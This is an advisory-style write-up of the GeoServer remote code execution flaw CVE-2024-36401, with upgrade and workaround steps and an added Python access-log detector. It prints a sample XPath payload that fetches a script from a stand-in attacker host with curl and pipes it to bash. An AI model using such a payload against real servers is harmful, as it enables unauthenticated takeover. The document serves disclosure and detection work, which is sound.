GeoServer (https://geoserver.org/) is a popular open source server that allows users to share, process, and edit geospatial data. It is built on the GeoTools library and supports various Open Geospatial Consortium (OGC) standards such as Web Feature Service (WFS), Web Map Service (WMS), and Web Processing Service (WPS). However, a critical vulnerability has been discovered in multiple OGC request parameters of GeoServer versions prior to 2.23.6, 2.24.4, and 2.25.2.

Details of Vulnerability

The vulnerability, identified as CVE-2024-36401, is a remote code execution (RCE) vulnerability that affects all GeoServer installations and allows unauthenticated users to execute arbitrary code through specifically crafted input. The issue stems from the GeoTools library API evaluating property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library, which is known to execute arbitrary code when evaluating XPath expressions.

Exploit Scenario

An attacker can exploit the vulnerability if they have the ability to send requests to a GeoServer instance. By sending a request that carries a specially crafted payload, an attacker can trigger the remote code execution vulnerability. By exploiting this vulnerability, an attacker can gain access to the server running GeoServer and perform malicious actions such as data theft or server compromise.

The following code snippet demonstrates the type of XPath expression that could be used in a malicious request:

/Feature[@name='system("curl attacker.com/exploit_code.sh | bash")']

Among the affected OGC request types is WPS Execute.

There is no public proof-of-concept (PoC) available at this time. However, the vulnerability has been confirmed to be exploitable by the GeoServer security team.
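The following script is an added example (not code from the advisory or from GeoServer/GeoTools) that turns the description above into a log check: it scans access-log lines for OGC requests whose property-name parameters contain a function call, which legitimate property names never do. The parameter names, the log format and the sample log lines are assumptions and constructed data, not taken from the advisory.

```python
"""Heuristic detector for CVE-2024-36401 probing in GeoServer access logs.
Added example, not code from the advisory or from GeoServer/GeoTools. Assumes
Combined Log Format lines and inspects only the GET parameters that GeoTools
evaluates as property names; a function call inside one is the tell-tale."""
import re
from urllib.parse import parse_qs, urlsplit

# Parameters whose values reach GeoTools as property names (assumed list).
# CQL_FILTER is excluded on purpose: filter functions are legitimate there.
PROPERTY_PARAMS = {"propertyname", "valuereference", "sortby"}
# Identifier followed by '(' = a function call; benign names such as gml:name
# or gsml:shape/gml:Polygon never match.
FUNCTION_CALL = re.compile(r"[A-Za-z_][\w.:]*\s*\(")
# client ident user [timestamp] "METHOD path PROTO" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def suspicious_params(url: str) -> dict:
    """Return {param: decoded value} for property-name params containing a call."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    hits = {}
    for key, values in query.items():
        if key.lower() in PROPERTY_PARAMS:
            for value in values:
                if FUNCTION_CALL.search(value):
                    hits[key] = value
    return hits

def scan_log(lines):
    """Return [(client, timestamp, param, value)] for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a (complete) access-log line
        client, ts, _method, path, _status = m.groups()
        for param, value in suspicious_params(path).items():
            findings.append((client, ts, param, value))
    return findings

# Constructed sample log: two benign OGC requests and one probe shaped like the
# advisory's expression, with the command replaced by a placeholder.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jul/2024:12:00:00 +0000] "GET /geoserver/wfs?service=WFS'
    '&request=GetFeature&typeNames=topp:states&propertyName=gml:name HTTP/1.1" 200 4120',
    '198.51.100.7 - - [10/Jul/2024:12:00:02 +0000] "GET /geoserver/wms?request=GetMap'
    '&layers=topp:states&CQL_FILTER=strToLowerCase(STATE_NAME)%3D%27il%27 HTTP/1.1" 200 9381',
    '203.0.113.5 - - [10/Jul/2024:12:00:05 +0000] "GET /geoserver/wfs?service=WFS'
    '&request=GetFeature&typeNames=topp:states&propertyName=%2FFeature%5B%40name%3D'
    '%27system%28%22PLACEHOLDER%22%29%27%5D HTTP/1.1" 500 812',
]
```

Only GET query strings are covered; WPS Execute requests arrive as XML POST bodies that access logs do not record, so those need inspection at the proxy or in GeoServer's own request logging.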

Solution

The GeoServer team has released patched versions of GeoServer (2.23.6, 2.24.4, and 2.25.2) that contain a fix for this vulnerability. It is strongly recommended to upgrade to one of these versions to protect against this critical vulnerability.

Workaround

If you are unable to upgrade your GeoServer instance to one of the patched versions, you can apply a temporary workaround by removing the vulnerable code from your GeoServer instance. To do this, remove the gt-complex-x.y.jar file from your GeoServer installation, where x.y is the GeoTools version (e.g., gt-complex-31.1.jar if running GeoServer 2.25.1). This will remove the vulnerable code but may also break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.

Conclusion

This vulnerability in GeoServer poses a significant risk to users of affected versions, as it allows unauthenticated users to remotely execute arbitrary code. It is essential to upgrade to a patched version or apply the suggested workaround to protect your server from potential exploitation.

For the latest information on this vulnerability and available patches, visit the GeoServer website at: https://geoserver.org/announcements/2024/04/12/jdd-2024-36401-geoserver.html

Timeline

Published on: 07/01/2024 16:15:04 UTC
Last modified on: 07/18/2024 21:28:49 UTC